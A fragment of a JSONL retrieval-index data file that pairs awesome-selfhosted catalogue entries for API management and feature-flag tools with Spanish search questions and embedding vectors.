-0.05613, 0.04138, 0.11724, -0.03603, 0.01778, 0.01396, 0.07176, 0.04897, 0.06104, 0.0797, 0.09333, -0.08245, 0.03015, -0.00325, -0.03789, -0.09383, 0.00734, -0.05579, -0.08217, -0.0264, 0.04531, 0.11693, -0.02137, -0.04889, -0.07209, 0.06249, -0.02799, -0.02697, -0.03114, 0.0721, 0.01783, -0.01752, 0.06946, -0.03959, 0.01338, -0.07086, -0.03837, -0.01508, -0.05325, -0.02405, 0.05405, -0.00711, -0.01517, 0.0793, -0.02229, 0.01586, 0.08046, 0.0971, 0.03427, 0.01944, 0.05861, 0.01941, 0.01258, -0.00523, -0.00526, 0.05373, 0.02491, 0.02362, -0.05995, -0.01039, -0.01739, 0.0234, 0.04947, 0.0029, 0.02147, 0.02648, -0.02095, 0.00989, 0.00302, -0.05431, 0.01435, 0.04272, -0.00056, -0.04172, 0.00281, -0.01575, 0.00788, -0.02703, 0.0086, 0.04238, -0.0294, -0.05617, -0.01662, -0.00557, -0.04002, 0.02912, -0.01863, -0.00992, -0.08518, -0.01137, 0.01691, 0.01358, -0.0038, 0.01394]} -{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Aastro β€” Extensible API Gateway written in Go [Apache-2.0, Go/Docker]. DreamFactory β€” Turns any SQL/NoSQL/Structured data into Restful API [Apache-2.0, PHP/Docker/K8S]. form.io β€” A REST API building platform that utilizes a drag & drop form builder, and is application framework agnostic. Contains open source and enterprise version [MIT, Nodejs/Docker]. Fusio β€” Open-source API management platform which helps to build and manage REST APIs [AGPL-3.0, PHP/Docker]. Graphweaver β€” Turn multiple data sources into a single GraphQL API [MIT, Nodejs]. Hasura β€” Fast, instant realtime GraphQL APIs on Postgres with fine grained access control, also trigger webhooks on database events [Apache-2.0, Haskell/Docker/K8S]. Hoppscotch Community Edition β€” Fast and beautiful API request builder [MIT, Nodejs/Docker]. Kong β€” Microservice API Gateway and Platform [Apache-2.0, Lua/Docker/K8S/deb]. Lura β€” High-performance API Gateway [Apache-2.0, Go].", "indexar": "con quΓ© herramienta puedo transformar mis datos SQL en una API pΓΊblica rΓ‘pidamente?", "v": [-0.16989, 0.06934, -0.09641, -0.24259, -0.01192, -0.2019, 0.02397, -0.1272, -0.10181, 0.08049, -0.07107, -0.13319, -0.00035, -0.06092, 0.01863, 0.03752, 0.06422, -0.16258, 0.02811, 0.05385, 0.03085, -0.06431, -0.10394, -0.07959, -0.05346, -0.03922, 0.09674, 0.07263, -0.14866, -0.03926, -0.07675, -0.00941, -0.05827, 0.01382, -0.05692, 0.00809, -0.03768, 0.10619, -0.05477, -0.07983, -0.00183, -0.06113, -0.13217, 0.02729, 0.03325, 0.02561, 0.02188, -0.00922, -0.00629, -0.04655, -0.12218, -0.10258, -0.20071, -0.02851, -0.03296, -0.04043, 0.0833, -0.08121, 0.06752, 0.00984, -0.14106, -0.03052, -0.0692, -0.03491, 0.02103, 0.02222, 0.04911, -0.009, -0.12975, 0.19647, -0.01835, -0.02997, -0.0029, -0.0729, 0.03174, -0.01247, 0.03701, -0.01733, -0.01825, 0.03398, -0.09633, 0.00056, -0.08597, 0.038, 0.07261, -0.03086, 0.08174, 0.00252, 0.04618, 0.01237, 0.00856, 0.03441, -1e-05, 0.03742, 0.05653, 0.09653, 0.02433, -0.1013, -0.08072, -0.00339, 0.01619, -0.01124, -0.15039, 0.0635, 0.05617, 0.07106, 0.05626, -0.00196, -0.03511, -0.03135, 0.03583, 0.00821, -0.03441, -0.04243, 0.08019, 0.07764, -0.01508, -0.01484, -0.06459, 0.0368, -0.01865, -0.0629, 0.04679, -0.0426, -0.04684, -0.03033, -0.06985, 0.06439, 0.00285, -0.01373, -0.02508, 0.01688, -0.06742, 0.02099, 0.0165, 0.06162, 0.03799, -0.15108, 0.02478, -0.07485, -0.01977, -0.01717, -0.05291, -0.05761, -0.01646, -0.10842, 0.04796, -0.0083, -0.10482, -0.06792, 0.04898, -0.05342, 0.0276, 0.01855, -0.08657, -0.0142, -0.0233, -0.03855, -0.10658, 0.01269, -0.02912, -0.03878, 0.00097, 0.02343, 0.04621, -0.05031, 0.08274, -0.03198, 0.09905, 0.02137, 0.04966, 0.05385, 0.09044, -0.12157, 0.08929, -0.01551, -0.10067, -0.02319, 0.00867, -0.09153, -0.02373, -0.03081, -0.01312, -0.02054, 0.01455, -0.05517, 0.01279, -0.05267, -0.0163, -0.03775, -0.03558, 0.05248, 0.08811, -0.07679, 0.05975, -0.04459, -0.02012, -0.04889, 0.02468, -0.03819, -0.04045, -0.01527, -0.06745, -0.0199, -0.05937, 0.03833, -0.04163, 0.02364, 0.00708, -0.03342, 0.00982, -0.00034, 0.04937, -0.0011, 0.0024, -0.01434, -0.01101, 0.015, -0.01386, 0.01424, -0.02386, 0.05649, 0.07203, -0.04809, 0.00432, 0.02112, -0.00196, -0.02027, -0.00722, 0.02758, 0.03687, -0.0415, 0.01489, 0.00047, 0.04268, -0.02087, -0.03428, -0.06896, -0.03689, -0.033, 0.02527, 0.06039, -0.05027, -0.03995, -0.00672, -0.01558, -0.04777, 0.01536, -0.01272, -0.08637, -0.04567, -0.01419, 0.08109, -0.03831, -0.01598, -0.03909]} -{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Aastro β€” Extensible API Gateway written in Go [Apache-2.0, Go/Docker]. DreamFactory β€” Turns any SQL/NoSQL/Structured data into Restful API [Apache-2.0, PHP/Docker/K8S]. form.io β€” A REST API building platform that utilizes a drag & drop form builder, and is application framework agnostic. Contains open source and enterprise version [MIT, Nodejs/Docker]. Fusio β€” Open-source API management platform which helps to build and manage REST APIs [AGPL-3.0, PHP/Docker]. Graphweaver β€” Turn multiple data sources into a single GraphQL API [MIT, Nodejs]. Hasura β€” Fast, instant realtime GraphQL APIs on Postgres with fine grained access control, also trigger webhooks on database events [Apache-2.0, Haskell/Docker/K8S]. Hoppscotch Community Edition β€” Fast and beautiful API request builder [MIT, Nodejs/Docker]. Kong β€” Microservice API Gateway and Platform [Apache-2.0, Lua/Docker/K8S/deb]. Lura β€” High-performance API Gateway [Apache-2.0, Go].", "indexar": "cual es una alternativa libre a las plataformas comerciales de gestiΓ³n de APIs?", "v": [-0.00657, 0.07519, 0.0297, -0.18249, -0.08639, -0.06542, 0.12807, -0.08042, -0.25548, -0.00714, -0.05722, -0.16627, -0.05345, 0.04014, 0.12198, -0.00035, 0.07032, -0.14104, 0.13043, 0.04937, -0.04928, 0.03014, -0.16769, -0.01614, 0.0008, -0.05773, 0.09225, -0.10929, -0.15025, -0.02108, -0.0384, -0.06091, 0.01113, -0.04696, -0.05798, -0.07666, 0.00362, 0.09998, 0.05862, -0.03085, 0.03803, -0.16775, -0.09653, -0.02044, 0.07624, 0.0024, 0.0273, -0.01444, -0.0058, 0.00743, -0.09379, -0.08581, -0.16914, 0.07911, 0.13611, 0.03433, 0.05222, -0.05342, 0.00559, -0.04339, -0.04676, -0.01786, 0.01441, -0.0593, 0.00339, 0.02635, -0.01408, 0.03375, -0.06847, 0.19828, 0.04553, -0.06096, 0.01141, 0.03284, -0.00545, 0.08399, 0.0319, 0.01105, -0.06822, 0.06397, 0.12038, -0.05852, -0.07237, 0.09737, 0.06583, -0.12843, -0.01747, -0.08813, 0.00823, 0.03299, -0.02375, -0.04543, -0.06517, 0.04214, 0.0594, -0.02046, -0.03345, 0.03514, -0.00991, 0.07638, -0.03776, 0.02595, -0.15478, -0.06536, 0.03389, 0.06609, 0.01693, -0.08869, -0.02174, 0.00746, 0.02426, 0.03506, -0.01123, 0.00143, -0.01454, 0.05466, -0.04211, 0.00243, 0.04644, 0.02058, -0.05428, -0.08912, 0.00697, -0.03067, 0.02327, 0.06621, -0.01771, 0.1079, -0.00747, 0.0117, 0.01356, -0.07401, -0.03628, -0.03217, -0.00266, 0.02116, 0.13777, 0.02998, 0.04909, 0.00908, -0.07369, 0.0164, -0.00466, -0.02262, 0.08833, -0.08404, 0.00259, -0.10048, 0.02376, 0.01451, -0.0175, -0.01809, -0.04113, 0.10357, -0.08224, 0.00562, -0.0401, -0.0029, -0.11701, 0.07377, 0.03974, 0.00574, -0.04588, 0.05464, 0.01953, -0.00665, 0.02574, 0.01601, -0.045, 0.01172, 0.04988, 0.0873, 0.05323, -0.13286, 0.0824, -0.04503, -0.04665, -0.05257, 0.05564, -0.05822, -0.06765, -0.05881, -0.06937, 0.03874, -0.05111, -0.07044, -0.04212, -0.02101, 0.01228, 0.03907, -0.06756, 0.0415, -0.06511, -0.03999, 0.02482, -0.03181, -0.02193, -0.03665, -0.07128, -0.02392, -0.07565, -0.01225, 0.01577, -0.06204, -0.06688, 0.00755, -0.02386, 0.06265, 0.06385, 0.00586, -0.00738, 0.005, 0.04532, -0.01872, -0.01889, -0.03271, 0.03259, -0.04205, 0.01539, -0.01313, -0.00963, 0.05118, -0.00085, 0.00619, -0.00416, 0.0515, 0.01626, 0.05255, -0.02046, 0.00218, -0.00387, 0.00265, 0.02958, 0.03101, 0.00504, -0.01862, 0.02662, -0.00384, 0.00847, -0.03139, 0.03882, 0.05231, -0.05645, -0.05264, 0.00464, -0.01186, -0.0851, -0.01361, -0.05716, -0.06794, -0.06745, 0.00621, 0.04356, 0.01135, 0.0381, 0.0193]} -{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Opik β€” Evaluate, test, and ship LLM applications with a suite of observability tools to calibrate language model outputs across your dev and production lifecycle [⚠, Apache-2.0, Docker/Python]. Para β€” Flexible and modular backend framework/server for object persistence, API development and authentication [Apache-2.0, Java/Docker]. Svix β€” Open-source webhooks as a service that makes it super easy for API providers to send webhooks [MIT, Docker/Rust]. Tyk β€” Fast and scalable open source API Gateway. Out of the box, Tyk offers an API Management Platform with an API Gateway, API Analytics, Developer Portal and API Management Dashboard [MPL-2.0, Go/Docker/K8S].", "indexar": "que herramienta sirve para evaluar y probar aplicaciones de LLM desde el desarrollo hasta la producciΓ³n?", "v": [-0.08028, 0.03666, -0.1549, -0.27833, 0.02039, -0.03799, -0.0075, 0.04128, -0.09759, -0.06558, -0.0689, -0.05407, 0.04278, -0.11101, -0.00264, 0.04886, -0.0142, -0.22052, -0.09977, -0.02609, -0.01684, 0.08397, -0.21089, -0.07764, -0.06964, 0.0933, 0.06138, -0.17116, -0.05928, 0.02301, -0.04335, 0.07337, 0.08081, -0.05298, -0.07014, -0.07618, -0.00331, -0.09222, -0.01926, 0.16775, 0.08311, 0.00579, 0.01768, 0.01447, 0.03732, 0.01392, 0.04112, 0.01839, -0.07829, -0.01742, -0.0531, -0.03541, 0.03727, 0.0257, 0.03838, -0.08097, 0.05816, -0.17131, 0.08204, -0.03924, -0.06017, -0.03583, 0.01237, -0.1396, 0.03024, -0.07182, -0.04749, -0.00824, -0.11157, 0.04848, -0.07847, 0.092, -0.01591, 0.01961, 0.03824, 0.02658, -0.03518, 0.10774, 0.02514, -0.05575, 0.00082, -0.02276, -0.07043, 0.02846, -0.04042, -0.1103, 0.1082, 0.02488, 0.02748, -0.01649, -0.0199, 0.00107, -0.03757, 0.0255, 0.02622, -0.05847, 0.13606, -0.08052, 0.11941, 0.05294, 0.04635, -0.15637, -0.02926, 0.02695, -0.06914, 0.07522, 0.05326, -0.02559, -0.06303, 0.02293, 0.0266, -0.03224, -0.04127, 0.03669, -0.07386, 0.05396, 0.00155, -0.12069, -0.07154, -0.06946, 0.01168, 0.04376, -0.07327, -0.04029, -0.00735, -0.08381, -0.03378, 0.08718, 0.01475, 0.05298, 0.02481, -0.03234, -0.04558, 0.03665, -0.00675, -0.02727, 0.07786, -0.05538, 0.01901, -0.06741, 0.04554, 0.09312, 0.0202, -0.05197, 0.06692, 0.01842, -0.06114, -0.05589, 0.00285, 0.01873, 0.04867, -0.03209, -0.01932, 0.00804, -0.10929, -0.00808, -0.04711, -0.04765, -0.01886, 0.04824, -0.01832, -0.01524, -0.06455, 0.00507, 0.04375, -0.03508, 0.03795, -0.02461, 0.13852, 0.05978, -0.01391, 0.01904, 0.05893, -0.08977, 0.07556, -0.04656, -0.01471, -0.01451, -0.00762, -0.12939, -0.02265, 0.01962, -0.06258, -0.01701, 0.01351, -0.04983, -0.00261, -0.00419, 0.06996, 0.05304, -0.01068, 0.08711, 0.02152, -0.04403, 0.02553, -0.0216, 0.0171, -0.07006, 0.00269, -0.04483, -0.06014, -0.01815, -0.0531, -0.03829, 0.03132, 0.04149, -0.03337, 0.06288, -0.04513, 0.02366, 0.02982, 0.03395, 0.0906, 0.04108, -0.01804, -0.05252, 0.04642, 0.07016, 0.00154, 0.01509, -0.02804, -0.02159, 0.03637, -0.0127, 0.0291, 0.02029, 0.04558, -0.00771, 0.05377, -0.00793, 0.01167, 0.02401, -0.01767, -0.04321, 0.01541, -0.00516, 0.02649, -0.04967, -0.06183, -0.07944, 0.00683, 0.05858, -0.00217, -0.02152, -0.07704, -0.03142, -0.05403, -0.01414, -0.00681, -0.08103, -0.02618, 0.03445, 0.07424, -0.01504, 0.00334, -0.0276]} -{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Opik β€” Evaluate, test, and ship LLM applications with a suite of observability tools to calibrate language model outputs across your dev and production lifecycle [⚠, Apache-2.0, Docker/Python]. Para β€” Flexible and modular backend framework/server for object persistence, API development and authentication [Apache-2.0, Java/Docker]. Svix β€” Open-source webhooks as a service that makes it super easy for API providers to send webhooks [MIT, Docker/Rust]. Tyk β€” Fast and scalable open source API Gateway. Out of the box, Tyk offers an API Management Platform with an API Gateway, API Analytics, Developer Portal and API Management Dashboard [MPL-2.0, Go/Docker/K8S].", "indexar": "con que puedo montar un backend flexible para persistencia de objetos y autenticaciΓ³n?", "v": [0.02731, 0.07122, -0.2941, -0.11857, -0.04413, 0.08015, -0.11213, 0.07824, -0.13049, -0.12848, -0.05867, -0.07181, 0.05944, -0.00035, -0.01127, 0.05608, 0.00344, -0.14468, -0.01083, 0.07358, 0.03719, -0.05396, -0.10672, -0.076, 0.09063, 0.09251, 0.0754, 0.02556, -0.14379, 0.02216, 0.03327, 0.04132, 0.00874, 0.12483, -0.00624, -0.06314, -0.03569, -0.02874, 0.01194, -0.03405, 0.00163, -0.02374, 0.13333, -0.00051, 0.04898, 0.1262, 0.00549, 0.05615, -0.08041, 0.11733, -0.00098, -0.08368, -0.21349, -0.00596, -0.11077, -0.03967, 0.17657, -0.09035, 0.1235, 0.02902, -0.07455, 0.04944, -0.02198, 0.04764, 0.08933, -0.00614, -0.04994, 0.01013, -0.07192, -0.00709, -0.05291, -0.06958, 0.03646, -0.03292, -0.06492, 0.09932, -0.00751, -0.02108, 0.07778, 0.14461, -0.09511, 0.07745, 0.01002, 0.06368, 0.09851, -0.02613, 0.00879, -0.12922, 0.08783, 0.00859, -0.0209, 0.02832, -0.03261, -0.10381, -0.01923, -0.02264, -0.00848, 0.05094, 0.01159, -0.00871, -0.09951, -0.03068, 0.0174, 0.02629, 0.15001, 0.00285, 0.06037, -0.00253, -0.00872, -0.02267, -0.01646, 0.03612, -0.08261, 0.07993, -0.01004, -0.11761, -0.03666, 0.05796, 0.06572, 0.04319, 0.05457, 0.01986, 0.06151, 0.07763, 0.07595, 0.08533, 0.10355, 0.05482, -0.08874, 0.01207, 0.01678, 0.01639, 0.01295, -0.03435, 0.03582, -0.01193, 0.10724, -0.07521, -0.00101, 0.01166, 0.07377, -0.05069, 0.03031, 0.05948, 0.0505, -0.06359, 0.00285, 0.01881, -0.05437, 0.04791, -0.01994, 0.13878, 0.12916, 0.00531, -0.05732, -0.01139, -0.00911, 0.00425, -0.10693, 0.07013, -0.04661, 0.05037, -0.03875, -0.01728, -0.06487, -0.04968, -0.04301, 0.02933, 0.01316, 0.02993, -0.02682, 0.03654, 0.05687, -0.02487, 0.06872, 0.04692, -0.05209, -0.02885, -0.01526, -0.07653, 0.05269, -0.05543, -0.0049, -0.00142, 0.09398, -0.0443, 0.05877, 0.02728, -0.03213, 0.05218, -0.03188, 0.01739, 0.01727, 0.00757, 0.03672, 0.04155, 0.02741, 0.00949, 0.00811, 0.03845, 0.02188, -0.01861, 0.02809, -0.02247, 0.00207, -0.01543, -0.03004, 0.00882, 0.06082, 0.00714, 0.04438, 0.02212, 0.02572, 0.01286, -0.00167, 0.02892, -0.06086, 0.03121, -0.02538, 0.00948, 0.01855, -0.01754, 0.00619, 0.04279, 0.09965, -0.0013, -0.0085, -0.00851, 0.01857, -0.06055, 0.06425, -0.07595, 0.00678, 0.00324, -0.01622, -0.04148, 0.03765, 0.03758, 0.03412, 0.04563, -0.05172, 0.04089, -0.00972, 0.00719, -0.00711, 0.00081, -0.0258, 0.01866, -0.05376, -0.07815, -0.03004, -0.03489, -0.01103, -0.02597, -0.00228, -0.02692]} -{"tipo": "pregunta", "herramienta": "Software Development - API Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - API Management", "tema": "software development - api management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - API Management: Opik β€” Evaluate, test, and ship LLM applications with a suite of observability tools to calibrate language model outputs across your dev and production lifecycle [⚠, Apache-2.0, Docker/Python]. Para β€” Flexible and modular backend framework/server for object persistence, API development and authentication [Apache-2.0, Java/Docker]. Svix β€” Open-source webhooks as a service that makes it super easy for API providers to send webhooks [MIT, Docker/Rust]. Tyk β€” Fast and scalable open source API Gateway. Out of the box, Tyk offers an API Management Platform with an API Gateway, API Analytics, Developer Portal and API Management Dashboard [MPL-2.0, Go/Docker/K8S].", "indexar": "cual es una alternativa libre a las webhooks como servicio para proveedores de APIs?", "v": [0.00395, -0.01084, -0.05272, -0.05866, -0.00953, -0.09296, 0.15121, -0.16152, -0.17976, -0.03048, -0.10259, -0.15094, -0.04969, -0.03157, 0.07727, -0.02041, 0.11156, -0.14629, 0.14692, 0.13673, -0.05749, 0.08813, -0.18745, -0.01025, -0.03465, 0.01325, 0.14599, -0.04269, -0.22094, 0.00909, -0.03208, -0.12072, -0.01933, 0.01671, -0.09592, 0.01537, -0.0353, 0.15045, 0.0576, 0.02637, 0.02402, -0.16055, -0.07799, -0.00011, -0.03832, 0.00899, 0.00434, -0.01121, 0.02842, -0.01422, -0.03219, -0.07918, -0.17627, 0.06467, 0.02448, 0.03842, 0.07494, -0.15737, -0.01744, 0.00611, -0.05243, -0.02519, -0.04502, -0.12371, 0.02232, -0.00113, -0.13465, 0.04825, -0.07096, 0.06095, 0.02271, -0.11092, 0.03085, -0.05042, -0.08024, 0.12876, -0.07416, -0.05964, -0.02809, 0.08631, 0.0982, 0.00496, 0.01798, 0.06426, 0.04643, -0.07373, 0.02265, -0.05846, 0.03369, 0.02563, 0.04884, 0.10576, -0.01983, 0.11562, 0.00592, -0.0205, 0.03548, 0.0056, 0.03917, -0.00104, 0.00786, 0.04745, -0.08493, 0.01376, 0.06449, 0.02241, 0.0632, 0.00743, -0.06933, -0.02008, -0.02293, 0.02972, -0.01809, 0.00254, 0.022, -0.03643, -0.02033, -0.01308, 0.01019, 0.00346, -0.02806, -0.00699, 0.03176, -0.00796, -0.01382, 0.05413, -0.04787, 0.02893, 0.00336, -0.02046, 0.04762, -0.02035, -0.08624, 0.01043, 0.01122, 0.00541, 0.15253, -0.04682, 0.07202, 0.01309, 0.01372, -0.04169, -0.00988, 0.03322, 0.05695, -0.06583, 0.01733, -0.04326, -0.04004, -0.02806, -0.08092, 0.03158, -0.05597, 0.04747, -0.11856, -0.01326, -0.08058, -0.0715, -0.04181, 0.06248, 0.01293, -0.04337, 0.06502, 0.0471, -0.00616, 0.07026, 0.00338, -0.01862, -0.03867, -0.01081, -0.00761, 0.05714, -0.01187, -0.11353, 0.0706, 0.0046, -0.04345, -0.07613, 0.05274, -0.04196, -0.01954, -0.04229, -0.09605, 0.08048, -0.0355, -0.06057, -0.0161, 0.01565, -0.01071, 0.01839, -0.04994, -0.00929, -0.06229, -0.02804, 0.05181, -0.05055, -0.0459, -0.06972, -0.07493, -0.07875, -0.0965, -0.02474, 0.02257, -0.04272, -0.05694, 0.01476, -0.00576, 0.01425, 0.01557, 0.05058, 0.05012, 0.00537, 0.09929, -0.04639, 0.01761, -0.03505, 0.06646, -0.05257, -0.0147, 0.04677, -0.03494, -0.01821, -0.01318, 0.00582, -0.00395, 0.02142, 0.05177, 0.03307, -0.05328, 0.03431, -0.02518, -0.0399, -0.02441, -0.01295, 0.02501, -0.00159, 0.0104, -0.00541, 0.03299, -0.0169, 0.04227, 0.06111, -0.08753, -0.01162, 0.03657, -0.05646, -0.08948, -0.02185, -0.04945, -0.02884, -0.06432, 0.02106, 0.0161, 0.01576, 0.02863, 0.00395]} -{"tipo": "pregunta", "herramienta": "Software Development - Feature Toggle", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Feature Toggle", "tema": "software development - feature toggle", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Feature Toggle: Featbit β€” Enterprise-grade feature flag platform that you can self-host [MIT, Docker/K8S]. Flagsmith β€” Dashboard, API and SDKs for adding Feature Flags to your applications (alternative to LaunchDarkly) [BSD-3-Clause, Docker/K8S]. Flipt β€” Feature flag solution with support for multiple data backends (alternative to LaunchDarkly) [GPL-3.0, Docker/K8S/Go]. GO Feature Flag β€” Simple, complete, and lightweight feature flag solution (alternative to LaunchDarkly) [MIT, Go].", "indexar": "que programa me sirve para gestionar las banderas de caracterΓ­sticas en mi aplicaciΓ³n", "v": [0.04954, 0.14074, -0.08441, -0.28933, 0.00249, -0.01797, -0.06742, -0.05567, -0.08069, -0.09433, 0.01415, -0.10099, 0.00707, -0.08652, -0.0042, 0.08558, 7e-05, -0.13981, 0.11125, 0.08802, -0.02643, 0.07555, 0.0088, -0.07657, -0.13331, 0.03112, 0.041, -0.07635, -0.04488, -0.00231, -0.00062, 0.01647, 0.09377, -0.12455, -0.05118, -0.06537, -0.06764, -0.02372, -0.01168, 0.02972, 0.02269, -0.02287, -0.01578, -0.0023, 0.11428, 0.01583, 0.11571, 0.0221, -0.02405, -0.04409, -0.03669, -0.03604, 0.01265, 0.07653, 0.04045, -0.08067, 0.01627, -0.143, -0.00601, -0.01947, -0.05356, 0.00388, 0.04212, -0.00172, 0.02699, -0.06051, 0.09729, 0.0862, -0.02713, 0.02425, -0.02121, 0.10587, -0.01188, -0.05577, -0.03213, 0.08128, -0.01398, 0.0318, 0.12622, -0.01362, 0.01311, 0.02198, -0.11519, 0.08741, -0.04341, -0.03354, 0.0258, -0.01795, 0.06071, -0.03101, -0.04042, 0.03211, -0.0501, -0.0137, -0.02685, 0.01032, 0.06798, 0.12049, 0.08475, 0.1084, 0.11698, -0.04518, -0.08796, 0.05843, -0.05649, 0.03902, 0.0514, -0.12858, -0.0394, 0.0303, -0.02623, -0.10507, 0.01532, 0.03943, -0.03495, 0.01966, 0.01794, -0.09473, -0.00368, -0.07297, -0.12857, -0.0097, 0.06654, -0.05042, 0.18823, -0.02372, -0.07522, 0.13796, -0.05705, 0.14609, -0.05862, -0.02469, -0.03717, 0.01776, -0.07037, -0.0324, -0.03895, -0.03543, -0.00122, -0.05011, -0.04065, 0.10627, -0.02053, 0.02223, 0.055, 0.00381, 0.01965, -0.02845, 0.06529, 0.06304, 0.05773, -0.11279, 0.00989, 0.03555, -0.10488, -0.05854, 0.05389, -0.03369, -0.10807, 0.00645, -0.02848, -0.02398, -0.08208, -0.00862, 0.06305, -0.01921, -0.02195, 0.02398, 0.11621, 0.10396, -0.00687, 0.0616, 0.03585, -0.05439, 0.0059, -0.03755, -0.03099, -0.05289, 0.02761, -0.00471, -0.0387, 0.02198, 0.09298, 0.0144, 0.03706, -0.05096, -0.11125, 0.06414, 0.01446, -0.04733, -0.01588, 0.00675, 0.03416, -0.02419, -0.00942, 0.03424, -0.01882, -0.03773, -0.01602, -0.03737, -0.07151, -0.03375, -0.06483, -0.01381, 0.07704, 0.12567, -0.01975, 0.05419, 0.08723, 0.06564, -0.01407, 0.0747, 0.03291, 0.07525, -0.02311, -0.04997, 0.04892, 0.05103, 0.07808, -0.0488, -0.06168, -0.00551, 0.0288, 0.04153, -0.04088, -0.01241, 0.05255, -0.0339, 0.00634, 0.01198, 0.02649, -0.01477, -0.02817, -0.01247, -0.00143, -0.06369, 0.00271, -0.06763, -0.03682, -0.12286, -0.03869, 0.06467, 0.02693, -0.02619, -0.03997, -0.02963, -0.03045, 0.00114, -0.03571, -0.00261, -0.04415, 0.01834, 0.05308, 0.00029, 0.03137, 0.02609]} -{"tipo": "pregunta", "herramienta": "Software Development - Feature Toggle", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Feature Toggle", "tema": "software development - feature toggle", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Feature Toggle: Featbit β€” Enterprise-grade feature flag platform that you can self-host [MIT, Docker/K8S]. Flagsmith β€” Dashboard, API and SDKs for adding Feature Flags to your applications (alternative to LaunchDarkly) [BSD-3-Clause, Docker/K8S]. Flipt β€” Feature flag solution with support for multiple data backends (alternative to LaunchDarkly) [GPL-3.0, Docker/K8S/Go]. GO Feature Flag β€” Simple, complete, and lightweight feature flag solution (alternative to LaunchDarkly) [MIT, Go].", "indexar": "cual es una alternativa libre a LaunchDarkly que pueda autoalojar", "v": [-0.23688, 0.00786, -0.06422, -0.00278, -0.09387, -0.01088, 0.04092, 0.02334, -0.23143, 0.05271, 0.01992, -0.3265, -0.1028, 0.02529, 0.05252, 0.00451, -0.05286, -0.04461, 0.02819, -0.01163, 0.00563, 0.08827, -0.12315, -0.15164, -0.00127, -0.03029, -0.00349, -0.09408, -0.16808, 0.03193, -0.00108, 0.0624, 0.08683, -0.05226, 0.09772, -0.08189, 0.16781, 0.10344, 0.16435, -0.03574, 0.04505, -0.06291, -0.01284, 0.05391, 0.01466, 0.06681, -0.03415, -0.03206, 0.05458, 0.01764, 0.02352, 0.01325, -0.06428, 0.01394, 0.12727, 0.01302, 0.20091, -0.03224, -0.00344, -0.07293, -0.10553, -0.02321, 0.01588, -0.01892, 0.00505, 0.01344, 0.01208, 0.05448, -0.09176, 0.06425, 0.0256, 0.0128, 0.18861, 0.05144, -0.04938, 0.03573, -0.10305, 0.05931, -0.00047, 0.11362, 0.00596, -0.06474, 0.04793, 0.11844, -0.01599, -0.02664, 0.07854, -0.00074, 0.03196, 0.05371, -0.02503, 0.02261, 0.03078, 0.12383, -0.07832, -0.05246, 0.0429, 0.12285, -0.01652, 0.00968, -0.01332, 0.01047, -0.08261, 0.04279, 0.0471, -0.06837, 0.01263, -0.00103, -0.04459, 0.01983, 0.03711, 0.0704, 0.02718, -0.02879, 0.00736, 0.00471, -0.00351, 0.05825, 0.02153, -0.00848, -0.09443, -0.06133, 0.03439, -0.07579, 0.01893, 0.0475, 0.01564, 0.0294, -0.05946, 0.05704, 0.0679, -0.01387, -0.06786, -0.04246, -0.10538, 0.00809, 0.05618, 0.0419, 0.01869, 0.02695, 0.06538, 0.02843, 0.0436, -0.06727, -0.00667, -0.04077, -0.05394, 0.02821, 0.02898, -0.06241, -0.06831, 0.00953, -0.0065, 0.06181, -0.06889, 0.02097, 0.01146, 0.01646, 0.10314, 0.02197, 0.0552, 0.01002, -0.05209, 0.03968, -0.00486, 0.01471, -0.04165, -0.06991, -0.0362, -0.01645, -0.0123, 0.07147, 0.06933, -0.03393, 0.04546, -0.00562, 0.02086, -0.08739, -0.01649, -0.02652, -0.0418, 0.01566, -0.10509, -0.0157, -0.00732, -0.01227, -0.03395, -0.03627, 0.02544, -0.04676, -0.06678, 0.06994, -0.04609, -0.06397, 0.03639, 0.01988, -0.01976, -0.11402, 0.0059, 0.04753, -0.09784, -0.0751, -0.03299, -0.03805, -0.04722, 0.00046, 0.01291, 0.04075, -0.01905, 0.06292, -0.00019, 0.03659, 0.07967, 0.01845, -0.02561, -0.00551, 0.02459, -0.04274, -0.00515, -0.02121, 0.01449, 0.04219, 0.03184, -0.04013, -0.04418, 0.0427, 0.03973, 0.00512, 0.00864, 0.01552, -0.00438, 0.00312, 0.00864, 0.01795, 0.00974, 0.03873, 0.02048, -0.00987, -0.01451, 0.00112, 0.10148, 0.04819, 0.00264, -0.03224, -0.00939, -0.02059, -0.02396, -0.00958, -0.02442, -0.02702, 0.00233, 0.06089, 0.0501, -0.02748, 0.04832, 0.01779]} -{"tipo": "pregunta", "herramienta": "Software Development - Feature Toggle", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Feature Toggle", "tema": "software development - feature toggle", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Feature Toggle: Featbit β€” Enterprise-grade feature flag platform that you can 